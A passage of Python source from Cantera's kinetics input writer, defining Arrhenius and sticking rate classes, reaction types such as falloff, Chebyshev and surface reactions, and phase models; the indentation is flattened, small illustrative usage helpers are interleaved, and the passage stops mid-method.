addFloat(a,'A',self._c[0]*self.unit_factor, fmt = '%14.6E')
elif len(self._c[0]) == 2 and self._c[0][1] == '/site':
addFloat(a,'A',self._c[0][0]/self.rxn_phase._sitedens,
fmt = '%14.6E')
else:
addFloat(a,'A',self._c[0], fmt = '%14.6E')
# The b coefficient should be dimensionless, so there is no
# need to use 'addFloat'
a.addChild('b', repr(self._c[1]))
# If a pure number is entered for the activation energy,
# add the default units, otherwise use the supplied units.
addFloat(a,'E', self._c[2], fmt = '%f', defunits = _ue)
# for surface reactions, a coverage dependence may be specified.
if self._cov:
for cov in self._cov:
c = a.addChild('coverage')
c['species'] = cov[0]
addFloat(c, 'a', cov[1], fmt = '%f')
c.addChild('m', repr(cov[2]))
addFloat(c, 'e', cov[3], fmt = '%f', defunits = _ue)
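# A minimal sketch of forward rate coefficients built with the class above; the
# numbers, unit strings, and species name are illustrative assumptions only.
def _example_rates():
    # pure numbers for A are converted to SI with the reaction's unit factor at build time
    plain = Arrhenius(A=1.2e14, b=0.0, E=(15.0, 'kcal/mol'))
    # surface rate with a single coverage dependency: [species, a, m, e]
    covered = Arrhenius(A=3.7e20, b=0.0, E=(50.0, 'kJ/mol'),
                        coverage=['CO(S)', 0.0, 0.0, -10.0])
    return plain, covered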
class stick(Arrhenius):
def build(self, p, name=''):
a = p.addChild('Arrhenius')
a['type'] = 'stick'
ngas = len(self.gas_species)
if ngas != 1:
raise CTI_Error("Sticking probabilities can only be used for "
"reactions with one gas-phase reactant, but this reaction has "
+ str(ngas) + ': ' + str(self.gas_species))
a['species'] = self.gas_species[0]
self.unit_factor = 1.0
Arrhenius.build(self, p, name, a)
def getPairs(s):
toks = s.split()
m = {}
for t in toks:
key, val = t.split(':')
m[key] = float(val)
return m
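# A small illustration of the parser above, used for the reaction 'order' option
# string; the call below is a sketch and the helper name is hypothetical.
def _example_order_parse():
    return getPairs('CH4:0.25 O2:1.5')   # -> {'CH4': 0.25, 'O2': 1.5}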
class reaction(object):
"""
A homogeneous chemical reaction with pressure-independent rate coefficient
and mass-action kinetics.
"""
def __init__(self,
equation = '',
kf = None,
id = '',
order = '',
options = []):
"""
:param equation:
A string specifying the chemical equation.
:param kf:
The rate coefficient for the forward direction. If a sequence of
three numbers is given, these will be interpreted as [A, b, E] in
the modified Arrhenius function :math:`A T^b exp(-E/\hat{R}T)`.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param order:
Override the default reaction orders implied by the reactant
stoichiometric coefficients. Given as a string of key:value pairs,
e.g. ``"CH4:0.25 O2:1.5"``.
:param options: Processing options, as described in
:ref:`sec-reaction-options`. May be one or more (as a list) of the
following: 'skip', 'duplicate', 'negative_A', 'negative_orders',
'nonreactant_orders'.
"""
self._id = id
self._e = equation
self._order = order
if isinstance(options, str):
self._options = [options]
else:
self._options = options
global _reactions
self._num = len(_reactions)+1
r = ''
p = ''
for e in ['<=>', '=>', '=']:
if self._e.find(e) >= 0:
r, p = self._e.split(e)
if e in ['<=>','=']: self.rev = 1
else: self.rev = 0
break
self._r = getReactionSpecies(r)
self._p = getReactionSpecies(p)
self._rxnorder = copy.copy(self._r)
if self._order:
order = getPairs(self._order)
for o in order.keys():
if o not in self._rxnorder and 'nonreactant_orders' not in self._options:
raise CTI_Error("order specified for non-reactant: "+o+" and no \'nonreactant_orders\' option given")
else:
self._rxnorder[o] = order[o]
self._kf = kf
self._igspecies = []
self._dims = [0]*4
self._rxnphase = None
self._type = ''
_reactions.append(self)
def unit_factor(self):
"""
Conversion factor from given rate constant units to the MKS (+kmol)
used internally by Cantera, taking into account the reaction order.
"""
return (math.pow(_length[_ulen], -self.ldim) *
math.pow(_moles[_umol], -self.mdim) / _time[_utime])
def build(self, p):
if self._id:
id = self._id
else:
id = '%04i' % self._num
self.mdim = 0
self.ldim = 0
rxnph = []
for s in self._r:
ns = self._rxnorder[s]
nm = -999
nl = -999
if _phases:
mindim = 4
for ph in _phases:
if ph.has_species(s):
nm, nl = ph.conc_dim()
if ph.is_ideal_gas():
self._igspecies.append(s)
if not ph in rxnph:
rxnph.append(ph)
self._dims[ph._dim] += 1
if ph._dim < mindim:
self._rxnphase = ph
mindim = ph._dim
break
if nm == -999:
raise CTI_Error("species "+s+" not found")
else:
# If no phases are defined, assume all reactants are in bulk
# phases
nm = 1
nl = -3
self.mdim += nm*ns
self.ldim += nl*ns
p.addComment(" reaction "+id+" ")
r = p.addChild('reaction')
r['id'] = id
if self.rev:
r['reversible'] = 'yes'
else:
r['reversible'] = 'no'
if 'duplicate' in self._options:
r['duplicate'] = 'yes'
if 'negative_A' in self._options:
r['negative_A'] = 'yes'
if 'negative_orders' in self._options:
r['negative_orders'] = 'yes'
if 'nonreactant_orders' in self._options:
r['nonreactant_orders'] = 'yes'
ee = self._e.replace('<','[').replace('>',']')
r.addChild('equation',ee)
if self._order:
for osp in self._rxnorder:
o = r.addChild('order',self._rxnorder[osp])
o['species'] = osp
# adjust the moles and length powers based on the dimensions of
# the rate of progress (moles/length^2 or moles/length^3)
if self._type == 'surface':
self.mdim += -1
self.ldim += 2
p = self._dims[:3]
if p[0] != 0 or p[1] != 0 or p[2] > 1:
raise CTI_Error(self._e +'\nA surface reaction may contain at most '+
'one surface phase.')
elif self._type == 'edge':
self.mdim += -1
self.ldim += 1
p = self._dims[:2]
if p[0] != 0 or p[1] > 1:
raise CTI_Error(self._e+'\nAn edge reaction may contain at most '+
'one edge phase.')
else:
self.mdim += -1
self.ldim += 3
# add the reaction type as an attribute if it has been specified.
if self._type:
r['type'] = self._type
# The default rate coefficient type is Arrhenius. If the rate
# coefficient has been specified as a sequence of three
# numbers, then create a new Arrhenius instance for it;
# otherwise, just use the supplied instance.
nm = ''
kfnode = r.addChild('rateCoeff')
if self._type == '':
self._kf = [self._kf]
elif self._type == 'surface':
self._kf = [self._kf]
elif self._type == 'edge':
self._kf = [self._kf]
elif self._type == 'threeBody':
self._kf = [self._kf]
self.mdim += 1
self.ldim -= 3
elif self._type == 'chebyshev':
self._kf = []
if self._type == 'edge':
if self._beta > 0:
electro = kfnode.addChild('electrochem')
electro['beta'] = repr(self._beta)
for kf in self._kf:
if isinstance(kf, rate_expression):
k = kf
else:
k = Arrhenius(A = kf[0], b = kf[1], E = kf[2])
if isinstance(kf, stick):
kf.gas_species = self._igspecies
kf.rxn_phase = self._rxnphase
k.unit_factor = self.unit_factor()
k.build(kfnode, name=nm)
if self._type == 'falloff':
# set values for low-pressure rate coeff if falloff rxn
self.mdim += 1
self.ldim -= 3
nm = 'k0'
elif self._type == 'chemAct':
# set values for high-pressure rate coeff if this is a
# chemically activated reaction
self.mdim -= 1
self.ldim += 3
nm = 'kHigh'
rstr = ' '.join('%s:%s' % item for item in self._r.items())
pstr = ' '.join('%s:%s' % item for item in self._p.items())
r.addChild('reactants',rstr)
r.addChild('products', pstr)
return r
#-------------------
class three_body_reaction(reaction):
"""
A three-body reaction.
"""
def __init__(self,
equation = '',
kf = None,
efficiencies = '',
id = '',
options = []
):
"""
:param equation:
A string specifying the chemical equation. The reaction can be
written in either the association or dissociation directions, and
may be reversible or irreversible.
:param kf:
The rate coefficient for the forward direction. If a sequence of
three numbers is given, these will be interpreted as [A, b, E] in
the modified Arrhenius function.
:param efficiencies:
A string specifying the third-body collision efficiencies.
The efficiencies for unspecified species are set to 1.0.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options: Processing options, as described in
:ref:`sec-reaction-options`.
"""
reaction.__init__(self, equation, kf, id, '', options)
self._type = 'threeBody'
self._effm = 1.0
self._eff = efficiencies
# clean up reactant and product lists
for r in list(self._r.keys()):
if r == 'M' or r == 'm':
del self._r[r]
for p in list(self._p.keys()):
if p == 'M' or p == 'm':
del self._p[p]
def build(self, p):
r = reaction.build(self, p)
if r == 0: return
kfnode = r.child('rateCoeff')
if self._eff:
eff = kfnode.addChild('efficiencies',self._eff)
eff['default'] = repr(self._effm)
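# A usage sketch for a third-body reaction; the rate parameters and collision
# efficiencies below are illustrative placeholders, and the helper name is hypothetical.
def _example_three_body():
    return three_body_reaction('2 O + M <=> O2 + M',
                               kf=[1.2e17, -1.0, 0.0],
                               efficiencies='AR:0.83 H2O:15.4')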
class pdep_reaction(reaction):
""" Base class for falloff_reaction and chemically_activated_reaction """
def clean_up_reactants_products(self):
del self._r['(+']
del self._p['(+']
if 'M)' in self._r:
del self._r['M)']
del self._p['M)']
elif 'm)' in self._r:
del self._r['m)']
del self._p['m)']
else:
for r in list(self._r.keys()):
if r[-1] == ')' and r.find('(') < 0:
species = r[:-1]
if self._eff:
raise CTI_Error('(+ '+species+') and '+self._eff+' cannot both be specified')
self._eff = species+':1.0'
self._effm = 0.0
del self._r[r]
del self._p[r]
def build(self, p):
r = reaction.build(self, p)
if r == 0: return
kfnode = r.child('rateCoeff')
if self._eff and self._effm >= 0.0:
eff = kfnode.addChild('efficiencies',self._eff)
eff['default'] = repr(self._effm)
if self._falloff:
self._falloff.build(kfnode)
class falloff_reaction(pdep_reaction):
""" A gas-phase falloff reaction. """
def __init__(self, equation, kf0, kf,
efficiencies='', falloff=None, id='', options=[]):
"""
:param equation:
A string specifying the chemical equation.
:param kf:
The rate coefficient for the forward direction in the high-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param kf0:
The rate coefficient for the forward direction in the low-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param efficiencies:
A string specifying the third-body collision efficiencies. The
efficiency for unspecified species is set to 1.0.
:param falloff:
An embedded entry specifying a falloff function. If omitted, a
unity falloff function (Lindemann form) will be used.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options:
Processing options, as described in :ref:`sec-reaction-options`.
"""
kf2 = (kf, kf0)
reaction.__init__(self, equation, kf2, id, '', options)
self._type = 'falloff'
# use a Lindemann falloff function by default
self._falloff = falloff
if self._falloff == None:
self._falloff = Lindemann()
self._effm = 1.0
self._eff = efficiencies
self.clean_up_reactants_products()
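# A construction sketch for a falloff reaction with a Troe broadening function
# (the Troe class is defined near the end of this file); all numbers are
# illustrative placeholders and the helper name is hypothetical.
def _example_falloff():
    return falloff_reaction('H + O2 (+ M) <=> HO2 (+ M)',
                            kf0=[2.8e19, -0.9, 0.0],   # low-pressure limit
                            kf=[4.5e12, 0.4, 0.0],     # high-pressure limit
                            efficiencies='AR:0.7 H2O:12.0',
                            falloff=Troe(A=0.5, T3=30.0, T1=90000.0, T2=6000.0))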
class chemically_activated_reaction(pdep_reaction):
""" A gas-phase, chemically activated reaction. """
def __init__(self, equation, kLow, kHigh,
efficiencies='', falloff=None, id='', options=[]):
"""
:param equation:
A string specifying the chemical equation.
:param kLow:
The rate coefficient for the forward direction in the low-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param kHigh:
The rate coefficient for the forward direction in the high-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param efficiencies:
A string specifying the third-body collision efficiencies. The
efficiency for unspecified species is set to 1.0.
:param falloff:
An embedded entry specifying a falloff function. If omitted, a
unity falloff function (Lindemann form) will be used.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options:
Processing options, as described in :ref:`sec-reaction-options`.
"""
reaction.__init__(self, equation, (kLow, kHigh), id, '', options)
self._type = 'chemAct'
# use a Lindemann falloff function by default
self._falloff = falloff
if self._falloff == None:
self._falloff = Lindemann()
self._effm = 1.0
self._eff = efficiencies
self.clean_up_reactants_products()
class pdep_arrhenius(reaction):
"""
Pressure-dependent rate calculated by interpolating between Arrhenius
expressions at different pressures.
:param equation:
A string specifying the chemical equation.
:param args:
Each additional argument is a sequence of four elements specifying the
pressure and the Arrhenius parameters at that pressure.
"""
def __init__(self, equation='', *args, **kwargs):
self.pressures = []
self.arrhenius = []
for p, A, b, Ea in args:
self.pressures.append(p)
self.arrhenius.append((A, b, Ea))
reaction.__init__(self, equation, self.arrhenius, **kwargs)
self._type = 'plog'
def build(self, p):
r = reaction.build(self, p)
kfnode = r.child('rateCoeff')
for i,c in enumerate(kfnode.children()):
assert c.name() == 'Arrhenius'
addFloat(c, 'P', self.pressures[i])
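# A sketch of a PLOG-style rate built with the class above: each extra positional
# argument gives (pressure, A, b, Ea). The species, pressures, and parameters are
# illustrative placeholders, and the helper name is hypothetical.
def _example_plog():
    return pdep_arrhenius('CH3 + OH <=> CH2O + H2',
                          [(0.01, 'atm'), 1.1e10, 1.0, 0.0],
                          [(1.0, 'atm'), 1.3e11, 0.9, 100.0],
                          [(10.0, 'atm'), 2.0e12, 0.8, 500.0])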
class chebyshev_reaction(reaction):
"""
Pressure-dependent rate calculated in terms of a bivariate Chebyshev
polynomial.
:param equation:
A string specifying the chemical equation.
:param Tmin:
The minimum temperature at which the rate expression is defined
:param Tmax:
the maximum temperature at which the rate expression is defined
:param Pmin:
The minimum pressure at which the rate expression is defined
:param Pmax:
The maximum pressure at which the rate expression is defined
:param coeffs:
A 2D array of the coefficients defining the rate expression. For a
polynomial with M points in temperature and N points in pressure, this
should be a list of M lists each with N elements.
"""
def __init__(self, equation='', Tmin=300.0, Tmax=2500.0,
Pmin=(0.001, 'atm'), Pmax=(100.0, 'atm'),
coeffs=[[]], **kwargs):
reaction.__init__(self, equation, **kwargs)
self._type = 'chebyshev'
self.Pmin = Pmin
self.Pmax = Pmax
self.Tmin = Tmin
self.Tmax = Tmax
self.coeffs = coeffs
# clean up reactant and product lists
if '(+' in self._r:
del self._r['(+']
del self._p['(+']
if 'M)' in self._r:
del self._r['M)']
del self._p['M)']
if 'm)' in self._r:
del self._r['m)']
del self._p['m)']
def build(self, p):
r = reaction.build(self, p)
kfnode = r.child('rateCoeff')
addFloat(kfnode, 'Tmin', self.Tmin)
addFloat(kfnode, 'Tmax', self.Tmax)
addFloat(kfnode, 'Pmin', self.Pmin)
addFloat(kfnode, 'Pmax', self.Pmax)
self.coeffs[0][0] += math.log10(self.unit_factor());
lines = []
for line in self.coeffs:
lines.append(', '.join('{0:12.5e}'.format(val)
for val in line))
coeffNode = kfnode.addChild('floatArray', ',\n'.join(lines))
coeffNode['name'] = 'coeffs'
coeffNode['degreeT'] = str(len(self.coeffs))
coeffNode['degreeP'] = str(len(self.coeffs[0]))
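# A construction sketch of a Chebyshev rate: coeffs is an M x N list of lists
# (M temperature points by N pressure points). Species names and values below
# are placeholders only, and the helper name is hypothetical.
def _example_chebyshev():
    return chebyshev_reaction('R1 + R2 (+ M) <=> P1 + P2 (+ M)',
                              Tmin=290.0, Tmax=3000.0,
                              Pmin=(0.001, 'atm'), Pmax=(100.0, 'atm'),
                              coeffs=[[8.2, 1.1, -0.08],
                                      [-1.2, 0.6, -0.04],
                                      [-0.4, 0.2, -0.01]])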
class surface_reaction(reaction):
"""
A heterogeneous chemical reaction with pressure-independent rate
coefficient and mass-action kinetics.
"""
def __init__(self, equation='', kf=None, id='', order='', options=[]):
"""
:param equation:
A string specifying the chemical equation.
:param kf:
The rate coefficient for the forward direction. If a sequence of
three numbers is given, these will be interpreted as [A, b, E] in
the modified Arrhenius function.
A reactive sticking probability can be given instead of a rate
constant by passing a :class:`stick` instance as ``kf``; this is
allowed only when the reaction has exactly one gas-phase reactant
belonging to an ideal gas phase.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options:
Processing options, as described in :ref:`sec-reaction-options`.
"""
reaction.__init__(self, equation, kf, id, order, options)
self._type = 'surface'
class edge_reaction(reaction):
def __init__(self,
equation = '',
kf = None,
id = '',
order = '',
beta = 0.0,
options = []):
reaction.__init__(self, equation, kf, id, order, options)
self._type = 'edge'
self._beta = beta
#--------------
class state(object):
"""
An embedded entry that specifies the thermodynamic state of a phase
or interface.
"""
def __init__(self,
temperature = None,
pressure = None,
mole_fractions = None,
mass_fractions = None,
density = None,
coverages = None,
solute_molalities = None):
"""
:param temperature:
The temperature.
:param pressure:
The pressure.
:param density:
The density. Cannot be specified if the phase is incompressible.
:param mole_fractions:
A string specifying the species mole fractions. Unspecified species
are set to zero.
:param mass_fractions:
A string specifying the species mass fractions. Unspecified species
are set to zero.
:param coverages:
A string specifying the species coverages. Unspecified species are
set to zero. Can only be specified for interfaces.
"""
self._t = temperature
self._p = pressure
self._rho = density
self._x = mole_fractions
self._y = mass_fractions
self._c = coverages
self._m = solute_molalities
def build(self, ph):
st = ph.addChild('state')
if self._t: addFloat(st, 'temperature', self._t, defunits = 'K')
if self._p: addFloat(st, 'pressure', self._p, defunits = _upres)
if self._rho: addFloat(st, 'density', self._rho, defunits = _umass+'/'+_ulen+'3')
if self._x: st.addChild('moleFractions', self._x)
if self._y: st.addChild('massFractions', self._y)
if self._c: st.addChild('coverages', self._c)
if self._m: st.addChild('soluteMolalities', self._m)
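# A brief sketch of an initial-state entry; the composition string and values are
# illustrative assumptions, and the helper name is hypothetical.
def _example_state():
    return state(temperature=300.0,
                 pressure=(1.0, 'atm'),
                 mole_fractions='O2:0.21 N2:0.79')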
class phase(object):
"""Base class for phases of matter."""
def __init__(self,
name = '',
dim = 3,
elements = '',
species = '',
note = '',
reactions = 'none',
initial_state = None,
options = []):
"""
:param name:
A string to identify the phase. Must be unique among the phase
names within the file.
:param elements:
The elements. A string of element symbols.
:param species:
The species. A string or sequence of strings in the format
described in :ref:`sec-defining-species`.
:param note:
A user-defined comment. Not evaluated by Cantera itself.
:param reactions:
The homogeneous reactions. If omitted, no reactions will be
included. A string or sequence of strings in the format described
in :ref:`sec-declaring-reactions`. This field is not allowed for
stoichiometric_solid and stoichiometric_liquid entries.
:param kinetics:
The kinetics model. Optional; if omitted, the default model for the
phase type will be used.
:param transport:
The transport property model. Optional. If omitted, transport
property calculation will be disabled.
:param initial_state:
Initial thermodynamic state, specified with an embedded state entry.
:param options:
Special processing options. Optional.
"""
self._name = name
self._dim = dim
self._el = elements
self._sp = []
self._rx = []
self._comment = note
if isinstance(options, str):
self._options = [options]
else:
self._options = options
self.debug = 0
if 'debug' in options:
self.debug = 1
#--------------------------------
# process species
#--------------------------------
# if a single string is entered, make it a list
if isinstance(species, str):
self._species = [species]
else:
self._species = species
self._skip = 0
# dictionary of species names
self._spmap = {}
# for each species string, check whether or not the species
# are imported or defined locally. If imported, the string
# contains a colon (:)
for sp in self._species:
icolon = sp.find(':')
if icolon > 0:
#datasrc, spnames = sp.split(':')
datasrc = sp[:icolon].strip()
spnames = sp[icolon+1:]
self._sp.append((datasrc+'.xml', spnames))
else:
spnames = sp
self._sp.append(('', spnames))
# strip the commas, and make the list of species names
# 10/31/03: commented out the next line, so that species names may contain commas
#sptoks = spnames.replace(',',' ').split()
sptoks = spnames.split()
for s in sptoks:
# check for stray commas
if s != ',':
if s[0] == ',': s = s[1:]
if s[-1] == ',': s = s[:-1]
if s != 'all' and s in self._spmap:
raise CTI_Error('Multiply-declared species '+s+' in phase '+self._name)
self._spmap[s] = self._dim
self._rxns = reactions
# check that species have been declared
if len(self._spmap) == 0:
raise CTI_Error('No species declared for phase '+self._name)
# and that only one species is declared if it is a pure phase
if self.is_pure() and len(self._spmap) > 1:
raise CTI_Error('Stoichiometric phases must declare exactly one species, \n'+
'but phase '+self._name+' declares '+str(len(self._spmap))+'.')
self._initial = initial_state
# add this phase to the global phase list
global _phases
_phases.append(self)
def is_ideal_gas(self):
"""True if the entry represents an ideal gas."""
return 0
def is_pure(self):
return 0
def has_species(self, s):
"""Return 1 is a species with name 's' belongs to the phase,
or 0 otherwise."""
if s in self._spmap: return 1
return 0
def conc_dim(self):
"""Concentration dimensions. Used in computing the units for reaction
rate coefficients."""
return (1, -self._dim)
def buildrxns(self, p):
if isinstance(self._rxns, str):
self._rxns = [self._rxns]
# for each reaction string, check whether or not the reactions
# are imported or defined locally. If imported, the string
# contains a colon (:)
for r in self._rxns:
icolon = r.find(':')
if icolon > 0:
#datasrc, rnum = r.split(':')
datasrc = r[:icolon].strip()
rnum = r[icolon+1:]
self._rx.append((datasrc+'.xml', rnum))
else:
rnum = r
self._rx.append(('', rnum))
for r in self._rx:
datasrc = r[0]
ra = p.addChild('reactionArray')
ra['datasrc'] = datasrc+'#reaction_data'
rk = None
if 'skip_undeclared_species' in self._options:
rk = ra.addChild('skip')
rk['species'] = 'undeclared'
if 'skip_undeclared_third_bodies' in self._options:
if not rk:
rk = ra.addChild('skip')
rk['third_bodies'] = 'undeclared'
rtoks = r[1].split()
if rtoks[0] != 'all':
i = ra.addChild('include')
#i['prefix'] = 'reaction_'
i['min'] = rtoks[0]
if len(rtoks) > 2 and (rtoks[1] == 'to' or rtoks[1] == '-'):
i['max'] = rtoks[2]
else:
i['max'] = rtoks[0]
def build(self, p):
p.addComment(' phase '+self._name+' ')
ph = p.addChild('phase')
ph['id'] = self._name
ph['dim'] = repr(self._dim)
# ------- error tests -------
#err = ph.addChild('validation')
#err.addChild('duplicateReactions','halt')
#err.addChild('thermo','warn')
e = ph.addChild('elementArray',self._el)
e['datasrc'] = 'elements.xml'
for s in self._sp:
datasrc, names = s
sa = ph.addChild('speciesArray',names)
sa['datasrc'] = datasrc+'#species_data'
if 'skip_undeclared_elements' in self._options:
sk = sa.addChild('skip')
sk['element'] = 'undeclared'
if self._rxns != 'none':
self.buildrxns(ph)
#self._eos.build(ph)
if self._initial:
self._initial.build(ph)
if self._comment:
ph.addChild('note',self._comment)
thermo = ph.addChild('thermo')
if 'allow_discontinuous_thermo' in self._options:
thermo['allow_discontinuities'] = 'true'
return ph
class ideal_gas(phase):
"""An ideal gas mixture."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
kinetics = 'GasKinetics',
transport = 'None',
initial_state = None,
options = []):
"""
The parameters correspond to those of :class:`.phase`, with the
following modifications:
:param kinetics:
The kinetics model. Usually this field is omitted, in which case
kinetics model GasKinetics, appropriate for reactions in ideal gas
mixtures, is used.
:param transport:
The transport property model. One of the strings ``'none'``,
``'multi'``, or ``'mix'``. Default: ``'none'``.
"""
phase.__init__(self, name, 3, elements, species, note, reactions,
initial_state, options)
self._pure = 0
self._kin = kinetics
self._tr = transport
if self.debug:
_printerr('Read ideal_gas entry '+self._name)
try:
_printerr('in file '+__name__)
except:
pass
def build(self, p):
ph = phase.build(self, p)
ph.child('thermo')['model'] = 'IdealGas'
k = ph.addChild("kinetics")
k['model'] = self._kin
t = ph.addChild('transport')
t['model'] = self._tr
def is_ideal_gas(self):
return 1
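# A construction sketch for an ideal-gas phase that imports species and reactions
# from another data source; 'mech' is an assumed external file name, not a real file,
# and the helper name is hypothetical.
def _example_ideal_gas_phase():
    return ideal_gas(name='gas',
                     elements='O H N Ar',
                     species='mech: all',
                     reactions='mech: all',
                     initial_state=state(temperature=300.0, pressure=(1.0, 'atm')))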
class stoichiometric_solid(phase):
"""
A solid compound or pure element. Stoichiometric solid phases contain
exactly one species, which always has unit activity. The solid is assumed
to have constant density. Therefore the rates of reactions involving these
phases do not contain any concentration terms for the (one) species in the
phase, since the concentration is always the same."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = None,
transport = 'None',
initial_state = None,
options = []):
"""
See :class:`.phase` for descriptions of the parameters.
"""
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 1
if self._dens is None:
raise CTI_Error('density must be specified.')
self._tr = transport
def conc_dim(self):
"""A stoichiometric solid always has unit activity, so the
generalized concentration is 1 (dimensionless)."""
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child('thermo')
e['model'] = 'StoichSubstance'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class stoichiometric_liquid(stoichiometric_solid):
"""
An incompressible stoichiometric liquid. Currently, there is no
distinction between stoichiometric liquids and solids.
"""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = -1.0,
transport = 'None',
initial_state = None,
options = []):
"""
See :class:`.phase` for descriptions of the parameters.
"""
stoichiometric_solid.__init__(self, name, elements,
species, note, density, transport,
initial_state, options)
class metal(phase):
"""A metal."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = -1.0,
transport = 'None',
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 0
self._tr = transport
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Metal'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class semiconductor(phase):
"""A semiconductor."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = -1.0,
bandgap = 1.0 * eV,
effectiveMass_e = 1.0 * ElectronMass,
effectiveMass_h = 1.0 * ElectronMass,
transport = 'None',
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 0
self._tr = transport
self._emass = effectiveMass_e
self._hmass = effectiveMass_h
self._bandgap = bandgap
def conc_dim(self):
return (1,-3)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Semiconductor'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
addFloat(e, 'effectiveMass_e', self._emass, defunits = _umass)
addFloat(e, 'effectiveMass_h', self._hmass, defunits = _umass)
addFloat(e, 'bandgap', self._bandgap, defunits = 'eV')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class incompressible_solid(phase):
"""An incompressible solid."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = None,
transport = 'None',
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 0
if self._dens is None:
raise CTI_Error('density must be specified.')
self._tr = transport
def conc_dim(self):
return (1,-3)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Incompressible'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class lattice(phase):
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
transport = 'None',
initial_state = None,
options = [],
site_density = None,
vacancy_species = ''):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._tr = transport
self._n = site_density
self._vac = vacancy_species
self._species = species
if name == '':
raise CTI_Error('sublattice name must be specified')
if species == '':
raise CTI_Error('sublattice species must be specified')
if site_density is None:
raise CTI_Error('sublattice '+name
+' site density must be specified')
def build(self,p, visible = 0):
#if visible == 0:
# return
ph = phase.build(self, p)
e = ph.child('thermo')
e['model'] = 'Lattice'
addFloat(e, 'site_density', self._n, defunits = _umol+'/'+_ulen+'3')
if self._vac:
e.addChild('vacancy_species',self._vac)
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class lattice_solid(phase):
"""A solid crystal consisting of one or more sublattices."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
lattices = [],
transport = 'None',
initial_state = None,
options = []):
# find elements
elist = []
for lat in lattices:
e = lat._el.split()
for el in e:
if not el in elist:
elist.append(el)
elements = ' '.join(elist)
# find species
slist = []
for lat in lattices:
_sp = ""
for spp in lat._species:
_sp += spp
s = _sp.split()
for sp in s:
if not sp in slist:
slist.append(sp)
species = ' '.join(slist)
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._lattices = lattices
if lattices == []:
raise CTI_Error('One or more sublattices must be specified.')
self._pure = 0
self._tr = transport
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'LatticeSolid'
if self._lattices:
lat = e.addChild('LatticeArray')
for n in self._lattices:
n.build(lat, visible = 1)
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class liquid_vapor(phase):
"""A fluid with a complete liquid/vapor equation of state.
This entry type selects one of a set of predefined fluids with
built-in liquid/vapor equations of state. The substance_flag
parameter selects the fluid. See purefluids.py for the usage
of this entry type."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
substance_flag = 0,
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._subflag = substance_flag
self._pure = 1
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'PureFluid'
e['fluid_type'] = repr(self._subflag)
k = ph.addChild("kinetics")
k['model'] = 'none'
class RedlichKwongMFTP(phase):
"""A multi-component fluid model for non-ideal gas fluids.
"""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
kinetics = 'GasKinetics',
initial_state = None,
activity_coefficients = None,
transport = 'None',
options = []):
phase.__init__(self,name, 3, elements, species, note, reactions,
initial_state,options)
self._pure = 0
self._kin = kinetics
self._tr = transport
self._activityCoefficients = activity_coefficients
def build(self, p):
ph = phase.build(self,p)
e = ph.child("thermo")
e['model'] = 'RedlichKwongMFTP'
if self._activityCoefficients:
a = e.addChild("activityCoefficients")
if isinstance(self._activityCoefficients, activityCoefficients):
self._activityCoefficients.build(a)
else:
na = len(self._activityCoefficients)
for n in range(na):
self._activityCoefficients[n].build(a)
if self._tr:
